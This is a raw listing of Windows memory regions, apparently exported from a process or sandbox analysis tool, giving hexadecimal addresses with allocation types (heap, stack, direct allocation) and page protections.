20860130000
direct allocation
page read and write
2085F10B000
heap
page read and write
2085DCD4000
heap
page read and write
1F32FEA1000
heap
page read and write
20D491B0000
heap
page read and write
2085C298000
heap
page read and write
2085E223000
heap
page read and write
20860120000
direct allocation
page read and write
2085E5AE000
heap
page read and write
614812C000
stack
page read and write
25EFD905000
heap
page read and write
185BC97D000
heap
page read and write
29F581A0000
heap
page read and write
185BB66A000
heap
page read and write
185BC756000
heap
page read and write
185BCAE8000
heap
page read and write
2085E63F000
heap
page read and write
2085F0E5000
heap
page read and write
2085E56B000
heap
page read and write
21D976DA000
heap
page read and write
185BCAD3000
heap
page read and write
2085F0EC000
heap
page read and write
1F32FE3F000
heap
page read and write
29F5805F000
heap
page read and write
185BC8B3000
heap
page read and write
7FF8E60E3000
unkown
page readonly
2085E08E000
heap
page read and write
2085E59F000
heap
page read and write
7FF8F7A0A000
unkown
page read and write
7FF8F8381000
unkown
page execute read
7FF8F3F33000
unkown
page readonly
18C8AED0000
heap
page read and write
21D82200000
heap
page read and write
185BC981000
heap
page read and write
2085E0D7000
heap
page read and write
185B985B000
heap
page read and write
24F21CB7000
heap
page read and write
24C75830000
heap
page read and write
24541A80000
heap
page read and write
185B985A000
heap
page read and write
2085E68B000
heap
page read and write
2085DC36000
heap
page read and write
2085E54E000
heap
page read and write
2085DCCC000
heap
page read and write
7FF8F8D86000
unkown
page read and write
7FF8E6F16000
unkown
page readonly
185BBEFA000
heap
page read and write
2085C2AA000
heap
page read and write
185BD7C0000
direct allocation
page read and write
1F32FEBA000
heap
page read and write
185BB7C2000
heap
page read and write
185BBB89000
heap
page read and write
185BC780000
heap
page read and write
1F32FE3F000
heap
page read and write
2085E683000
heap
page read and write
2085E683000
heap
page read and write
185BBBEE000
heap
page read and write
7FF8F7A00000
unkown
page readonly
2085C290000
heap
page read and write
1F32FE36000
heap
page read and write
185BB338000
heap
page read and write
2085E5AA000
heap
page read and write
2085E1D2000
heap
page read and write
185BD000000
direct allocation
page read and write
7FF67A642000
unkown
page readonly
7FF8FF5B9000
unkown
page readonly
2085F2D9000
heap
page read and write
2085E187000
heap
page read and write
2085F187000
heap
page read and write
185BB358000
heap
page read and write
7FF8F8383000
unkown
page readonly
2085E15A000
heap
page read and write
7FF8E7A92000
unkown
page readonly
185BB683000
heap
page read and write
1F32FE67000
heap
page read and write
24A03B80000
heap
page read and write
2085C2A8000
heap
page read and write
2085E77D000
heap
page read and write
F3FDEFD000
stack
page read and write
2085FB08000
direct allocation
page read and write
7FF8FF5E1000
unkown
page execute read
185BB6BE000
heap
page read and write
25EFD907000
heap
page read and write
185BC7CA000
heap
page read and write
20860110000
direct allocation
page read and write
2085DCA3000
heap
page read and write
18FDF278000
heap
page read and write
185BBE98000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185B985F000
heap
page read and write
2085E204000
heap
page read and write
FB5C1FF000
stack
page read and write
185BC79C000
heap
page read and write
2085E68A000
heap
page read and write
2085F0F6000
heap
page read and write
2085F0E9000
heap
page read and write
281E0107000
heap
page read and write
2085DBFE000
heap
page read and write
185BCAB3000
heap
page read and write
7FF8F83F4000
unkown
page readonly
20860130000
direct allocation
page read and write
2085E70B000
heap
page read and write
185BD593000
heap
page read and write
185BB3E5000
heap
page read and write
185BB328000
heap
page read and write
2085F35E000
heap
page read and write
24A03A10000
heap
page read and write
2085E6BA000
heap
page read and write
7FF8E6EF3000
unkown
page read and write
22F6FE20000
heap
page read and write
21D976C7000
heap
page read and write
185BB38C000
heap
page read and write
21D820D0000
heap
page read and write
2085E593000
heap
page read and write
A8D357F000
stack
page read and write
1F32FEA1000
heap
page read and write
2085E19E000
heap
page read and write
2085E4A2000
heap
page read and write
20860140000
direct allocation
page read and write
2085F22A000
heap
page read and write
2085DCD5000
heap
page read and write
2085E11B000
heap
page read and write
25EFD905000
heap
page read and write
185BBC19000
heap
page read and write
24F21CA0000
remote allocation
page read and write
20860120000
direct allocation
page read and write
2961260C000
heap
page read and write
2085E0BB000
heap
page read and write
185BC981000
heap
page read and write
2085E656000
heap
page read and write
2085E4FC000
heap
page read and write
21D820DB000
heap
page read and write
7FF67A640000
unkown
page read and write
185BB6C9000
heap
page read and write
7FF8F85A0000
unkown
page readonly
2085DC13000
heap
page read and write
25EFD90C000
heap
page read and write
185BBBB0000
heap
page read and write
185B9854000
heap
page read and write
2085E24A000
heap
page read and write
2085E5AE000
heap
page read and write
18A3D75B000
heap
page read and write
296125E0000
remote allocation
page read and write
2085E656000
heap
page read and write
185BB353000
heap
page read and write
7FF8E6F96000
unkown
page readonly
185BCAC5000
heap
page read and write
1F32FDA0000
heap
page read and write
185BD940000
direct allocation
page read and write
18FDF26C000
heap
page read and write
EDEDAFF000
stack
page read and write
7FF8F83B9000
unkown
page read and write
20860130000
direct allocation
page read and write
2085E66D000
heap
page read and write
18A3D720000
heap
page read and write
20860120000
direct allocation
page read and write
279B91D0000
heap
page read and write
2085E503000
heap
page read and write
2085E233000
heap
page read and write
185B9845000
heap
page read and write
2085E7B0000
heap
page read and write
185B9868000
heap
page read and write
2085E58E000
heap
page read and write
2085E53E000
heap
page read and write
2085F0B2000
heap
page read and write
2085E850000
heap
page read and write
25EE47E8000
heap
page read and write
18FDF26E000
heap
page read and write
185BB343000
heap
page read and write
185BB371000
heap
page read and write
210407E0000
heap
page read and write
2085F09E000
heap
page read and write
28CCB398000
heap
page read and write
2085F1AB000
heap
page read and write
25EFD905000
heap
page read and write
25EE47ED000
heap
page read and write
7FF8F8757000
unkown
page readonly
185B9844000
heap
page read and write
7FF67A642000
unkown
page readonly
185BBCB1000
heap
page read and write
7FF8FF576000
unkown
page readonly
185BB834000
heap
page read and write
20860100000
direct allocation
page read and write
25EFD912000
heap
page read and write
B167E7B000
stack
page read and write
2085E156000
heap
page read and write
7FF8E77D1000
unkown
page execute read
185BBE2E000
heap
page read and write
185BC78F000
heap
page read and write
7FF8F85A1000
unkown
page execute read
185BBF11000
heap
page read and write
2085E664000
heap
page read and write
185BBC27000
heap
page read and write
185BC756000
heap
page read and write
185BCA1D000
heap
page read and write
2085E1AA000
heap
page read and write
7FF8FF5DC000
unkown
page readonly
2085F0CF000
heap
page read and write
2085F0EB000
heap
page read and write
2085FC50000
direct allocation
page read and write
185BB680000
heap
page read and write
20860120000
direct allocation
page read and write
185BBDD0000
heap
page read and write
185BCAC0000
heap
page read and write
2085F1F6000
heap
page read and write
2085E683000
heap
page read and write
2085E49D000
heap
page read and write
185BB7C6000
heap
page read and write
2085E586000
heap
page read and write
185BB7A9000
heap
page read and write
2085E6FA000
heap
page read and write
7FF8E8028000
unkown
page readonly
185BC7C5000
heap
page read and write
185BB7E7000
heap
page read and write
2085E480000
heap
page read and write
2085E527000
heap
page read and write
185BC776000
heap
page read and write
26027D20000
heap
page read and write
2085E4A9000
heap
page read and write
7FF67A62B000
unkown
page readonly
28CCB5E0000
heap
page read and write
185BD481000
heap
page read and write
185BBCA7000
heap
page read and write
185BB7E4000
heap
page read and write
7FF7C3D0B000
unkown
page readonly
281E0010000
heap
page read and write
2085E54E000
heap
page read and write
10A3DAF000
stack
page read and write
185BBEFB000
heap
page read and write
185BC752000
heap
page read and write
2085F1E6000
heap
page read and write
29612673000
heap
page read and write
2085E22A000
heap
page read and write
185BC831000
heap
page read and write
25EFD913000
heap
page read and write
185BB32F000
heap
page read and write
7FF8F847F000
unkown
page readonly
18FDF26A000
heap
page read and write
185BCAD8000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185B9839000
heap
page read and write
25EFD90C000
heap
page read and write
185BB3CD000
heap
page read and write
2085E864000
heap
page read and write
20860120000
direct allocation
page read and write
185BB33C000
heap
page read and write
E6D85FF000
stack
page read and write
2085E1FA000
heap
page read and write
29F58053000
heap
page read and write
185B9855000
heap
page read and write
185BB6C9000
heap
page read and write
25EFD90A000
heap
page read and write
2085E08E000
heap
page read and write
2085ED10000
direct allocation
page read and write
2085F0B5000
heap
page read and write
2085E212000
heap
page read and write
185BBF35000
heap
page read and write
2085DCBB000
heap
page read and write
185BB397000
heap
page read and write
2085E1B3000
heap
page read and write
24F21E80000
heap
page read and write
2085E0AD000
heap
page read and write
185BBBE0000
heap
page read and write
2085E471000
heap
page read and write
2085DC36000
heap
page read and write
185B9860000
heap
page read and write
185BB3AD000
heap
page read and write
185BD910000
direct allocation
page read and write
2085E090000
heap
page read and write
1F4966E0000
heap
page read and write
A8D309B000
stack
page read and write
2234A8F0000
heap
page read and write
7FF8E7140000
unkown
page readonly
185BB6BE000
heap
page read and write
185BB75B000
heap
page read and write
185BBBA8000
heap
page read and write
20860100000
direct allocation
page read and write
2085E86B000
heap
page read and write
2085C2B1000
heap
page read and write
185BBF48000
heap
page read and write
2085E0D7000
heap
page read and write
185BCACB000
heap
page read and write
185BCA1D000
heap
page read and write
185BBD28000
heap
page read and write
2085E637000
heap
page read and write
18FDF277000
heap
page read and write
2085E71D000
heap
page read and write
2085E536000
heap
page read and write
2085E492000
heap
page read and write
2085DCA3000
heap
page read and write
24541A50000
heap
page read and write
18FDF26A000
heap
page read and write
185BB340000
heap
page read and write
2085E09C000
heap
page read and write
2085E0A5000
heap
page read and write
2085DC36000
heap
page read and write
185BB3AE000
heap
page read and write
185BBDBB000
heap
page read and write
24F21CF3000
heap
page read and write
185BBEB1000
heap
page read and write
2085E080000
heap
page read and write
2085DC2E000
heap
page read and write
185BBEFA000
heap
page read and write
2085E0B0000
heap
page read and write
2085E079000
heap
page read and write
25EFD905000
heap
page read and write
2085E12B000
heap
page read and write
18FDF26A000
heap
page read and write
7FF8E6FE4000
unkown
page read and write
185BB32D000
heap
page read and write
2085E6FA000
heap
page read and write
24F21CC4000
heap
page read and write
185BBF09000
heap
page read and write
2085E515000
heap
page read and write
7FF8E5CAC000
unkown
page execute read
18FDF267000
heap
page read and write
185BB6C8000
heap
page read and write
185BB768000
heap
page read and write
2085F1F9000
heap
page read and write
2085E58E000
heap
page read and write
2085DC8C000
heap
page read and write
2085F160000
heap
page read and write
29F5802C000
heap
page read and write
2085E5AE000
heap
page read and write
185B9868000
heap
page read and write
7FF8E7FAD000
unkown
page read and write
29F58078000
heap
page read and write
2085E244000
heap
page read and write
BBB76FF000
stack
page read and write
2085E736000
heap
page read and write
185BD7F0000
direct allocation
page read and write
20860140000
direct allocation
page read and write
1C5A6F41000
heap
page read and write
185BC79E000
heap
page read and write
185B987E000
heap
page read and write
2085E0FA000
heap
page read and write
2085FA7C000
direct allocation
page read and write
185BB759000
heap
page read and write
5B2EDFE000
stack
page read and write
29612659000
heap
page read and write
185BB6BD000
heap
page read and write
7FF8E7290000
unkown
page readonly
185BB40D000
heap
page read and write
2BE0CC00000
heap
page read and write
25308710000
heap
page read and write
2085E0FA000
heap
page read and write
281E010B000
heap
page read and write
185B983B000
heap
page read and write
185BB3FE000
heap
page read and write
7FF67A63E000
unkown
page read and write
2085E212000
heap
page read and write
25EFD90C000
heap
page read and write
185BD485000
heap
page read and write
2085E25C000
heap
page read and write
20860140000
direct allocation
page read and write
2085E228000
heap
page read and write
7FF8E774B000
unkown
page read and write
185BBE73000
heap
page read and write
7FF67A642000
unkown
page readonly
185BB6E9000
heap
page read and write
185BC979000
heap
page read and write
25EE4814000
heap
page read and write
29F58091000
heap
page read and write
7FF8F8BB0000
unkown
page readonly
2085E185000
heap
page read and write
2085E1F7000
heap
page read and write
185BD7C0000
direct allocation
page read and write
185BD800000
direct allocation
page read and write
2085F0E3000
heap
page read and write
185BB39F000
heap
page read and write
20860110000
direct allocation
page read and write
21D9771C000
heap
page read and write
2085E5A5000
heap
page read and write
185BBDE8000
heap
page read and write
185BBEAC000
heap
page read and write
185BBBE7000
heap
page read and write
28CCB3BF000
heap
page read and write
18A3D781000
heap
page read and write
185BB7BF000
heap
page read and write
18FDF277000
heap
page read and write
2085E53C000
heap
page read and write
185BD7F0000
direct allocation
page read and write
20860100000
direct allocation
page read and write
1F4965C0000
heap
page read and write
185BB66F000
heap
page read and write
185BC7C5000
heap
page read and write
2085C2AA000
heap
page read and write
185BB69E000
heap
page read and write
2085F11F000
heap
page read and write
25EFD912000
heap
page read and write
185BB780000
heap
page read and write
2085E4DE000
heap
page read and write
20860130000
direct allocation
page read and write
7FF8F83C0000
unkown
page readonly
185BBE24000
heap
page read and write
2085E68D000
heap
page read and write
185BB3DE000
heap
page read and write
185BCAD4000
heap
page read and write
2085DCA6000
heap
page read and write
2085DC56000
heap
page read and write
7FF8E5B8E000
unkown
page readonly
10A418F000
stack
page read and write
2085E563000
heap
page read and write
2085E153000
heap
page read and write
7FF8E6EF2000
unkown
page readonly
29612649000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185BBDC5000
heap
page read and write
185BBEFA000
heap
page read and write
279B91E0000
heap
page read and write
18FDF248000
heap
page read and write
2085E233000
heap
page read and write
29F58091000
heap
page read and write
185BBD9E000
heap
page read and write
2085DC41000
heap
page read and write
2085E24C000
heap
page read and write
185BBE5E000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085E15E000
heap
page read and write
AA5D3FF000
stack
page read and write
185BC840000
heap
page read and write
2085E212000
heap
page read and write
185BBBE5000
heap
page read and write
185BBD28000
heap
page read and write
185BCA24000
heap
page read and write
2085E5A6000
heap
page read and write
210405E1000
heap
page read and write
7FF8F3F32000
unkown
page readonly
2085E4EE000
heap
page read and write
1F4965E0000
heap
page read and write
7FF7C3D20000
unkown
page read and write
7FF8E6A0A000
unkown
page read and write
7FF8E774C000
unkown
page write copy
2085E674000
heap
page read and write
21D976B7000
heap
page read and write
2085E09E000
heap
page read and write
185BB3D9000
heap
page read and write
2085C2BF000
heap
page read and write
185B986E000
heap
page read and write
25EE481B000
heap
page read and write
185BC3E0000
direct allocation
page read and write
2085DC07000
heap
page read and write
20860150000
direct allocation
page read and write
2085E114000
heap
page read and write
7FF8E60AB000
unkown
page read and write
2085DC5D000
heap
page read and write
26027FE0000
heap
page read and write
185BC8CF000
heap
page read and write
2085E6B8000
heap
page read and write
185BBC60000
heap
page read and write
185BC80A000
heap
page read and write
185BB769000
heap
page read and write
7FF8F8301000
unkown
page execute read
2085C2B0000
heap
page read and write
185BBB8E000
heap
page read and write
185BC887000
heap
page read and write
24F21CF3000
heap
page read and write
1F4966C0000
heap
page read and write
185BB3C3000
heap
page read and write
20860120000
direct allocation
page read and write
185BBE77000
heap
page read and write
25EFD905000
heap
page read and write
7FF8E5A9C000
unkown
page readonly
185BB7D5000
heap
page read and write
185B983C000
heap
page read and write
25EFD911000
heap
page read and write
7FF7C3CE0000
unkown
page readonly
7FF8E6FD0000
unkown
page readonly
185BB320000
heap
page read and write
2085FC98000
direct allocation
page read and write
2085E5A6000
heap
page read and write
1A3D5FF000
stack
page read and write
185BB3C6000
heap
page read and write
185BB699000
heap
page read and write
2085E254000
heap
page read and write
25EFD912000
heap
page read and write
2085DCD3000
heap
page read and write
185BB3C5000
heap
page read and write
7FF8F8374000
unkown
page read and write
7FF8E8010000
unkown
page readonly
2085E11B000
heap
page read and write
18FDF267000
heap
page read and write
7FF8E7E56000
unkown
page read and write
2085DC91000
heap
page read and write
2085E151000
heap
page read and write
7FF8E5970000
unkown
page readonly
18FDF26A000
heap
page read and write
7FF8E6F75000
unkown
page readonly
2085F10B000
heap
page read and write
7FF8F8490000
unkown
page readonly
2085E55E000
heap
page read and write
29612870000
heap
page read and write
7FF67A63E000
unkown
page read and write
2085E0EB000
heap
page read and write
7FF67A63E000
unkown
page write copy
185BBD42000
heap
page read and write
7FF8F7A95000
unkown
page readonly
25308770000
heap
page read and write
7FF8F9181000
unkown
page execute read
185BBD50000
heap
page read and write
24F21D17000
heap
page read and write
2085E4F6000
heap
page read and write
18FDF26A000
heap
page read and write
2085E7B0000
heap
page read and write
185BD48C000
heap
page read and write
2085DC02000
heap
page read and write
185BBBA1000
heap
page read and write
2085F0AE000
heap
page read and write
185BB7E4000
heap
page read and write
2085F0E3000
heap
page read and write
2085DC79000
heap
page read and write
7FF67A600000
unkown
page readonly
2085DC91000
heap
page read and write
2085DC36000
heap
page read and write
185BD7D0000
direct allocation
page read and write
28CCB389000
heap
page read and write
D9011E4000
stack
page read and write
2085E11B000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BBF09000
heap
page read and write
185BB7DD000
heap
page read and write
7FF8F7AA1000
unkown
page execute read
7FF8F8BB1000
unkown
page execute read
18FDF275000
heap
page read and write
2085E1D4000
heap
page read and write
29F58039000
heap
page read and write
2085F10B000
heap
page read and write
2085C2CC000
heap
page read and write
24C75850000
heap
page read and write
185BBEDA000
heap
page read and write
7FF8E7FA0000
unkown
page readonly
2085C2B5000
heap
page read and write
7FF8E5ACA000
unkown
page read and write
185BC7C7000
heap
page read and write
A8D319E000
stack
page read and write
210405B0000
heap
page read and write
2085E4AA000
heap
page read and write
2085F07D000
heap
page read and write
7FF8E66FF000
unkown
page read and write
7FF8E7DD3000
unkown
page read and write
7FF8FF5C1000
unkown
page execute read
25EFD90C000
heap
page read and write
2085E5A7000
heap
page read and write
185BBD8A000
heap
page read and write
7FF8E8033000
unkown
page read and write
2085E1D4000
heap
page read and write
185BC79F000
heap
page read and write
185BC7C6000
heap
page read and write
7FF8F8361000
unkown
page execute read
185BD7D0000
direct allocation
page read and write
185BB74E000
heap
page read and write
185B9970000
heap
page read and write
2085E637000
heap
page read and write
185BB3CD000
heap
page read and write
B1680FF000
stack
page read and write
18A3D750000
heap
page read and write
185BBC6F000
heap
page read and write
7FF8E77C7000
unkown
page read and write
24F21D30000
heap
page read and write
185BBF5E000
heap
page read and write
25EFD905000
heap
page read and write
7FF8E6100000
unkown
page readonly
185BBEFA000
heap
page read and write
2085E816000
heap
page read and write
2085E4A9000
heap
page read and write
2085E114000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085E674000
heap
page read and write
185BB3E0000
heap
page read and write
2085E68D000
heap
page read and write
7FF8E8001000
unkown
page read and write
24F21CCD000
heap
page read and write
2085E0D9000
heap
page read and write
185BB7D1000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BBD42000
heap
page read and write
138D1E3000
stack
page read and write
185BBD65000
heap
page read and write
185BB660000
heap
page read and write
185B9854000
heap
page read and write
18FDF26B000
heap
page read and write
18FDF26A000
heap
page read and write
185BBD28000
heap
page read and write
7FF8F7A9D000
unkown
page readonly
2085E175000
heap
page read and write
185BB6C1000
heap
page read and write
2085F112000
heap
page read and write
185BC8B9000
heap
page read and write
7FF8E6F60000
unkown
page readonly
2085E494000
heap
page read and write
185BBBB7000
heap
page read and write
2085E091000
heap
page read and write
185BBC09000
heap
page read and write
7FF8E5C72000
unkown
page execute read
20860288000
direct allocation
page read and write
7FF8F85C1000
unkown
page execute read
185BBD8A000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185BC87B000
heap
page read and write
1F32FE3F000
heap
page read and write
2085F370000
heap
page read and write
185BCA2D000
heap
page read and write
2085E14E000
heap
page read and write
2085F106000
heap
page read and write
185BB41A000
heap
page read and write
2085E637000
heap
page read and write
2085E491000
heap
page read and write
185BBBDC000
heap
page read and write
2085E674000
heap
page read and write
7FF8E7312000
unkown
page execute read
25EFD913000
heap
page read and write
185BCACD000
heap
page read and write
2085E16F000
heap
page read and write
185BD830000
direct allocation
page read and write
7FF8E7E15000
unkown
page read and write
2085DCA8000
heap
page read and write
2085E0C2000
heap
page read and write
18FDF25E000
heap
page read and write
A8D347E000
stack
page read and write
18FDF271000
heap
page read and write
2085E11B000
heap
page read and write
171C4373000
heap
page read and write
185BC87D000
heap
page read and write
7FF8F8758000
unkown
page read and write
7FF8E6F41000
unkown
page execute read
2085DC5E000
heap
page read and write
2085E515000
heap
page read and write
7FF8E72B2000
unkown
page execute read
2085E515000
heap
page read and write
185BBF4A000
heap
page read and write
7FF8E7021000
unkown
page execute read
185BBB7B000
heap
page read and write
7FF8F8442000
unkown
page readonly
2085E090000
heap
page read and write
29612641000
heap
page read and write
185BBE5E000
heap
page read and write
28CCB5EA000
heap
page read and write
2085E869000
heap
page read and write
2085E589000
heap
page read and write
185BB750000
heap
page read and write
7FF8F85B3000
unkown
page readonly
185BBEFA000
heap
page read and write
25EFD90C000
heap
page read and write
24541A55000
heap
page read and write
25EFD913000
heap
page read and write
185BBCB0000
heap
page read and write
185BB7AD000
heap
page read and write
C47B7FF000
stack
page read and write
171C4240000
heap
page read and write
18B7EC4E000
heap
page read and write
2085C2B3000
heap
page read and write
185BBB86000
heap
page read and write
2085E0D1000
heap
page read and write
185BBD98000
heap
page read and write
7FF8E6EF0000
unkown
page readonly
21D976DB000
heap
page read and write
185BB764000
heap
page read and write
2085C2C1000
heap
page read and write
185BB85E000
heap
page read and write
2085E190000
heap
page read and write
185BB3EC000
heap
page read and write
2085C1B0000
heap
page read and write
2085E0B8000
heap
page read and write
7FF8FF5F9000
unkown
page readonly
2085C2A2000
heap
page read and write
2085F204000
heap
page read and write
185BBC01000
heap
page read and write
185BB711000
heap
page read and write
171C434E000
heap
page read and write
185BB72D000
heap
page read and write
185BB740000
heap
page read and write
185B9852000
heap
page read and write
2085DC92000
heap
page read and write
2085E674000
heap
page read and write
7FF8F847D000
unkown
page read and write
25EFD90C000
heap
page read and write
18FDF26A000
heap
page read and write
185BCAC8000
heap
page read and write
185BBBAC000
heap
page read and write
2234A6D1000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BC7A5000
heap
page read and write
2085E56B000
heap
page read and write
24541921000
heap
page read and write
2085E48D000
heap
page read and write
185BB3D9000
heap
page read and write
185BBF16000
heap
page read and write
25EFD912000
heap
page read and write
24F21D4B000
heap
page read and write
185BB3F1000
heap
page read and write
2085DCC3000
heap
page read and write
20860110000
direct allocation
page read and write
2085DBD0000
direct allocation
page read and write
7FF7C3D1E000
unkown
page read and write
185BBBEA000
heap
page read and write
2085F1EF000
heap
page read and write
25EFD905000
heap
page read and write
2085E77D000
heap
page read and write
29612618000
heap
page read and write
18FDF274000
heap
page read and write
1F32FE87000
heap
page read and write
7FF8F83AF000
unkown
page readonly
2BE0CC07000
heap
page read and write
185BB560000
direct allocation
page read and write
185BD2E0000
direct allocation
page read and write
185BB6C0000
heap
page read and write
2085E66A000
heap
page read and write
185B986F000
heap
page read and write
7FF8E7155000
unkown
page readonly
2085DC93000
heap
page read and write
7FF8E8034000
unkown
page read and write
2085E08F000
heap
page read and write
185BC7AB000
heap
page read and write
7FF8E7783000
unkown
page readonly
18FDF26A000
heap
page read and write
28CCB3BF000
heap
page read and write
185BBC37000
heap
page read and write
2085E587000
heap
page read and write
2085C28F000
heap
page read and write
7FF8FF5C0000
unkown
page readonly
29F58078000
heap
page read and write
7FF8F7A01000
unkown
page execute read
2085E180000
heap
page read and write
7FF8E7E14000
unkown
page write copy
185BBF57000
heap
page read and write
185BB80D000
heap
page read and write
185BB837000
heap
page read and write
2085E559000
heap
page read and write
185BB7B3000
heap
page read and write
7FF8E7682000
unkown
page readonly
1F4965F2000
heap
page read and write
185BB81F000
heap
page read and write
2085E5D2000
heap
page read and write
2085E674000
heap
page read and write
2085E1B3000
heap
page read and write
185BCACB000
heap
page read and write
2085F10D000
heap
page read and write
185BBED8000
heap
page read and write
185BB7B9000
heap
page read and write
185BBC28000
heap
page read and write
185BBBAF000
heap
page read and write
7FF8E6F86000
unkown
page read and write
20860100000
direct allocation
page read and write
2085E4DC000
heap
page read and write
29F58053000
heap
page read and write
185BC79C000
heap
page read and write
2085E562000
heap
page read and write
185BB675000
heap
page read and write
1ED9B291000
heap
page read and write
24C75B70000
heap
page read and write
2085E667000
heap
page read and write
185BCAD8000
heap
page read and write
7FF8F83F2000
unkown
page readonly
18FDF265000
heap
page read and write
185BB346000
heap
page read and write
25EFD8FA000
heap
page read and write
2085F38B000
heap
page read and write
25EE481B000
heap
page read and write
185BBED8000
heap
page read and write
20860170000
direct allocation
page read and write
185BB675000
heap
page read and write
185BCA1D000
heap
page read and write
2085E0BB000
heap
page read and write
185BBD84000
heap
page read and write
24C75B75000
heap
page read and write
7FF8E6F10000
unkown
page readonly
2085F119000
heap
page read and write
185BB75E000
heap
page read and write
2085E244000
heap
page read and write
7FF8F3F35000
unkown
page readonly
185BB675000
heap
page read and write
2085E22C000
heap
page read and write
185BBD50000
heap
page read and write
29612590000
heap
page read and write
2085E58C000
heap
page read and write
185BBE5E000
heap
page read and write
2B6485BD000
heap
page read and write
1F32FDE0000
remote allocation
page read and write
18FDF278000
heap
page read and write
29612602000
heap
page read and write
185BCAD9000
heap
page read and write
7FF8F7EC5000
unkown
page read and write
185BBBAD000
heap
page read and write
18FDF1D0000
heap
page read and write
185BB280000
direct allocation
page read and write
20860130000
direct allocation
page read and write
2085E153000
heap
page read and write
185BB777000
heap
page read and write
25EFD90C000
heap
page read and write
2085E244000
heap
page read and write
2085E4E3000
heap
page read and write
24F21CF2000
heap
page read and write
2085E099000
heap
page read and write
7FF8E7B08000
unkown
page readonly
24F21CCB000
heap
page read and write
25EE47E6000
heap
page read and write
185BBE2E000
heap
page read and write
185BB6C9000
heap
page read and write
7FF8E77D0000
unkown
page readonly
2085E51C000
heap
page read and write
2085E15A000
heap
page read and write
7FF8E6FC0000
unkown
page readonly
2085E771000
heap
page read and write
185BBBB7000
heap
page read and write
25EFD905000
heap
page read and write
20860130000
direct allocation
page read and write
2085DC82000
heap
page read and write
185BBC80000
heap
page read and write
2085F126000
heap
page read and write
185BD840000
direct allocation
page read and write
2085F0CE000
heap
page read and write
2085E6CF000
heap
page read and write
138D5CF000
stack
page read and write
28CCB3BF000
heap
page read and write
EA593FF000
stack
page read and write
2085E0AE000
heap
page read and write
7FF8F7AA1000
unkown
page read and write
185BD7D0000
direct allocation
page read and write
7FF8E60B1000
unkown
page readonly
2085E499000
heap
page read and write
185BB315000
heap
page read and write
25EFD903000
heap
page read and write
29F58026000
heap
page read and write
7CACAFF000
stack
page read and write
29F57E90000
heap
page read and write
185BB3EA000
heap
page read and write
2085C297000
heap
page read and write
7FF8E77A1000
unkown
page execute read
7FF8FF584000
unkown
page readonly
22F6FEC1000
heap
page read and write
18FDF26A000
heap
page read and write
2085E6AA000
heap
page read and write
2085E0DB000
heap
page read and write
2085E660000
heap
page read and write
18FDF26A000
heap
page read and write
2085DC59000
heap
page read and write
2085E22C000
heap
page read and write
2085F11C000
heap
page read and write
2085E77D000
heap
page read and write
2085E4E9000
heap
page read and write
18FDF271000
heap
page read and write
2085DC90000
heap
page read and write
185BB698000
heap
page read and write
2085DCA3000
heap
page read and write
7FF7C3CE0000
unkown
page readonly
2085F960000
direct allocation
page read and write
2085E091000
heap
page read and write
2085E101000
heap
page read and write
2085E6EB000
heap
page read and write
2085DC27000
heap
page read and write
18FDF240000
heap
page read and write
2085E156000
heap
page read and write
185BB694000
heap
page read and write
18FDF274000
heap
page read and write
2085E5BB000
heap
page read and write
18FDF271000
heap
page read and write
185BC81B000
heap
page read and write
24F21D49000
heap
page read and write
7FF8F83F0000
unkown
page readonly
2085C28B000
heap
page read and write
2085E1E0000
heap
page read and write
25EFD905000
heap
page read and write
185BB832000
heap
page read and write
2085E1E2000
heap
page read and write
29612673000
heap
page read and write
18FDF278000
heap
page read and write
7FF8F8305000
unkown
page readonly
2085E162000
heap
page read and write
2085E0A5000
heap
page read and write
2085E22C000
heap
page read and write
18FDF271000
heap
page read and write
2085DBF0000
heap
page read and write
18C8ADDB000
heap
page read and write
7FF8F8392000
unkown
page readonly
2085E270000
direct allocation
page read and write
2085DC5E000
heap
page read and write
25EE4AE5000
heap
page read and write
2085E0AC000
heap
page read and write
185BB778000
heap
page read and write
2085F106000
heap
page read and write
20860120000
direct allocation
page read and write
2085E071000
heap
page read and write
185BB3C6000
heap
page read and write
2085F126000
heap
page read and write
7FF8F8370000
unkown
page readonly
2085E574000
heap
page read and write
7FF8F8407000
unkown
page readonly
2085DC36000
heap
page read and write
7FF8E71D1000
unkown
page execute read
185BD7D0000
direct allocation
page read and write
185BCAD8000
heap
page read and write
185BC79C000
heap
page read and write
185BD7C0000
direct allocation
page read and write
25EFD905000
heap
page read and write
E8997FF000
stack
page read and write
2085F370000
heap
page read and write
2085E26E000
heap
page read and write
185BB76B000
heap
page read and write
2085E0BB000
heap
page read and write
185BBC09000
heap
page read and write
20860100000
direct allocation
page read and write
2085E090000
heap
page read and write
185BD820000
direct allocation
page read and write
2085E212000
heap
page read and write
21D97640000
heap
page read and write
29F57F90000
heap
page read and write
185BB290000
unkown
page readonly
20860120000
direct allocation
page read and write
185BB6C7000
heap
page read and write
2085E63B000
heap
page read and write
2085E0D7000
heap
page read and write
2085E0FC000
heap
page read and write
185BC7B5000
heap
page read and write
185BB83A000
heap
page read and write
171C45C0000
heap
page read and write
2085E728000
heap
page read and write
25EE47C8000
heap
page read and write
18FDF26A000
heap
page read and write
7FF8E66FE000
unkown
page write copy
185B9805000
heap
page read and write
2085DCCC000
heap
page read and write
185BBC00000
heap
page read and write
1C5A7140000
heap
page read and write
185BD1CC000
direct allocation
page read and write
4EABFBE000
stack
page read and write
2085F0DE000
heap
page read and write
2085DCD4000
heap
page read and write
25EFD908000
heap
page read and write
185BBBB4000
heap
page read and write
2085DC5A000
heap
page read and write
5911EFF000
unkown
page read and write
185BB387000
heap
page read and write
2085DC41000
heap
page read and write
185BC160000
direct allocation
page read and write
2085E71D000
heap
page read and write
18FDF26A000
heap
page read and write
18FDF267000
heap
page read and write
185BCAB0000
heap
page read and write
185BB3E5000
heap
page read and write
20860130000
direct allocation
page read and write
2085E1E2000
heap
page read and write
2085E187000
heap
page read and write
185BBF0C000
heap
page read and write
2085E5AE000
heap
page read and write
185BB3C7000
heap
page read and write
185BB6B8000
heap
page read and write
18FDF278000
heap
page read and write
185BB3CA000
heap
page read and write
2085E597000
heap
page read and write
25EFD905000
heap
page read and write
2085E097000
